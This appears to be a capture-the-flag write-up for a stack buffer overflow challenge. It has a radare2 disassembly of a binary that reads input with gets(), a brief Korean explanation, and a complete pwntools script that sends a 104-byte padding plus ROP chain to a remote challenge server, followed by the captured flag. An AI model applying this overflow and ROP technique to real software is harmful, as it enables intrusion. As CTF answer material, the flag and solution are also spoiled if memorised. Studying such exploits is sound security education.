; CALL XREF from main @ 0x4008b8(x)
┌ 97: fcn.00400797 ();
│ 0x00400797 55 push rbp
│ 0x00400798 4889e5 mov rbp, rsp
│ 0x0040079b 488b05ee08.. mov rax, qword [obj.stdin] ; [0x601090:8]=0
│ 0x004007a2 b900000000 mov ecx, 0
│ 0x004007a7 ba02000000 mov edx, 2
│ 0x004007ac be00000000 mov esi, 0
│ 0x004007b1 4889c7 mov rdi, rax
│ 0x004007b4 e8c7feffff call sym.imp.setvbuf ; int setvbuf(FILE*stream, char *buf, int mode, size_t size)
│ 0x004007b9 488b05c008.. mov rax, qword [obj.stdout] ; [0x601080:8]=0
│ 0x004007c0 b900000000 mov ecx, 0
│ 0x004007c5 ba02000000 mov edx, 2
│ 0x004007ca be00000000 mov esi, 0
│ 0x004007cf 4889c7 mov rdi, rax
│ 0x004007d2 e8a9feffff call sym.imp.setvbuf ; int setvbuf(FILE*stream, char *buf, int mode, size_t size)
│ 0x004007d7 488b05c208.. mov rax, qword [obj.stderr] ; [0x6010a0:8]=0
│ 0x004007de b900000000 mov ecx, 0
│ 0x004007e3 ba02000000 mov edx, 2
│ 0x004007e8 be00000000 mov esi, 0
│ 0x004007ed 4889c7 mov rdi, rax
│ 0x004007f0 e88bfeffff call sym.imp.setvbuf ; int setvbuf(FILE*stream, char *buf, int mode, size_t size)
│ 0x004007f5 90 nop
│ 0x004007f6 5d pop rbp
└ 0x004007f7 c3 ret
[0x00400797]> s main
[0x004008ab]> pdf
; DATA XREF from entry0 @ 0x4006cd(r)
┌ 78: int main (int argc, char **argv, char **envp);
│ ; var int64_t var_60h @ rbp-0x60
│ 0x004008ab 55 push rbp
│ 0x004008ac 4889e5 mov rbp, rsp
│ 0x004008af 4883ec60 sub rsp, 0x60
│ 0x004008b3 b800000000 mov eax, 0
│ 0x004008b8 e8dafeffff call fcn.00400797
│ 0x004008bd 488d3de600.. lea rdi, str.Whats_your_name_ ; 0x4009aa ; "What's your name?"
│ 0x004008c4 e867fdffff call sym.imp.puts ; int puts(const char *s)
│ 0x004008c9 488d45a0 lea rax, [var_60h]
│ 0x004008cd 4889c7 mov rdi, rax
│ 0x004008d0 b800000000 mov eax, 0
│ 0x004008d5 e896fdffff call sym.imp.gets ; char *gets(char *s)
│ 0x004008da 488d45a0 lea rax, [var_60h]
│ 0x004008de 4889c6 mov rsi, rax
│ 0x004008e1 488d3dd400.. lea rdi, str.Hi___s__n ; 0x4009bc ; "Hi, %s!\\n"
│ 0x004008e8 b800000000 mov eax, 0
│ 0x004008ed e84efdffff call sym.imp.printf ; int printf(const char *format)
│ 0x004008f2 b800000000 mov eax, 0
│ 0x004008f7 c9 leave
└ 0x004008f8 c3 ret
[0x004008ab]> ss fcn.004006f0
[0x004006f0]> pdf
; CALL XREF from entry.fini0 @ 0x40076d(x)
┌ 37: fcn.004006f0 ();
│ 0x004006f0 55 push rbp
│ 0x004006f1 b868106000 mov eax, 0x601068 ; 'h\\x10`'
│ 0x004006f6 483d68106000 cmp rax, 0x601068 ; 'h\\x10`'
│ 0x004006fc 4889e5 mov rbp, rsp
│ ┌─< 0x004006ff 7417 je 0x400718
│ │ 0x00400701 b800000000 mov eax, 0
│ │ 0x00400706 4885c0 test rax, rax
│ ┌──< 0x00400709 740d je 0x400718
│ ││ 0x0040070b 5d pop rbp
│ ││ 0x0040070c bf68106000 mov edi, 0x601068 ; 'h\\x10`'
│ ││ 0x00400711 ffe0 jmp rax
..
│ └└─> 0x00400718 5d pop rbp
└ 0x00400719 c3 ret
[0x004006f0]>
간단한 BOF 문제다. 위 `main`을 보면 `rbp-0x60`의 버퍼에 길이 검사가 없는 `gets`로 입력을 받으므로, 버퍼 0x60(96)바이트 + 저장된 rbp 8바이트 = 104바이트 뒤의 반환 주소를 덮어쓸 수 있다. 반환 주소를 ROP 가젯으로 바꿔 rdi, rsi에 특정 값을 넣은 뒤 `0x4007f8`(아래 exploit이 win 함수로 쓰는 주소로, 위 목록에는 디스어셈블되어 있지 않다)로 진입해 If문을 넘어가면 된다.
from pwn import *
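# Target selection: the challenge server by default; pass LOCAL on the command
# line (pwntools `args`, e.g. `python3 exploit.py LOCAL`) to run ./arg under
# pwntools instead, which is what the gdb.attach() line below needs.
if args.LOCAL:
    p = process('./arg')
else:
    p = remote('server.sqli.kr', 30000)

e = ELF('./arg')             # no-PIE x86-64 binary: the .text addresses in the listing are fixed
context.arch = 'amd64'       # 64-bit little-endian; also governs p64() packing
context.log_level = 'debug'  # dump every byte sent/received while developing the chain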
def slog(name, addr):
    """Emit a pwntools success line of the form ``name: 0x...`` for an address.

    ``addr`` is formatted with hex(); the return value is whatever success() returns.
    """
    line = f"{name}: {hex(addr)}"
    return success(line)
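# gdb.attach(p, 'b *0x004008f8')  # break on main's `ret` to watch the chain take over (LOCAL only)

# ROP gadgets in ./arg (addresses from the exploit; the binary is not PIE).
pop_rdi = 0x0000000000400963          # pop rdi; ret
pop_rsi_r15_ret = 0x0000000000400961  # pop rsi; pop r15; ret

# Return target: the function that starts right after fcn.00400797's ret at
# 0x4007f7. It is not disassembled in the listing above; the chain feeds it
# the rdi/rsi values the exploit needs to get past its check.
win_addr = 0x4007F8
win_arg1 = 0x232300    # -> rdi
win_arg2 = 0xDEEDBEAF  # -> rsi. NOTE(review): spelled DEEDBEAF (not DEADBEEF); taken
                       # from the working exploit -- confirm against the compare in win.

# main() calls gets() into [rbp-0x60]: 0x60 bytes of buffer plus 8 bytes of
# saved rbp sit before the saved return address.
RET_OFFSET = 0x60 + 8  # 104

pay = b'A' * RET_OFFSET
pay += p64(pop_rdi) + p64(win_arg1)
pay += p64(pop_rsi_r15_ret) + p64(win_arg2) + p64(0)  # r15 is don't-care
pay += p64(win_addr)

# gets() stops at the first newline, so a 0x0a byte anywhere in the chain
# would silently truncate it.
if b'\n' in pay:
    raise ValueError("payload contains a newline; gets() would truncate the ROP chain")

# gets() only returns on newline/EOF: terminate the line ourselves rather than
# relying on a keystroke in interactive() to release it.
p.sendlineafter(b"name?", pay)
p.interactive()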

flag : Sunrin{ad85191532e811257634004e00fb9c907ac0985fac455358d2cae1ebabdd4ce2}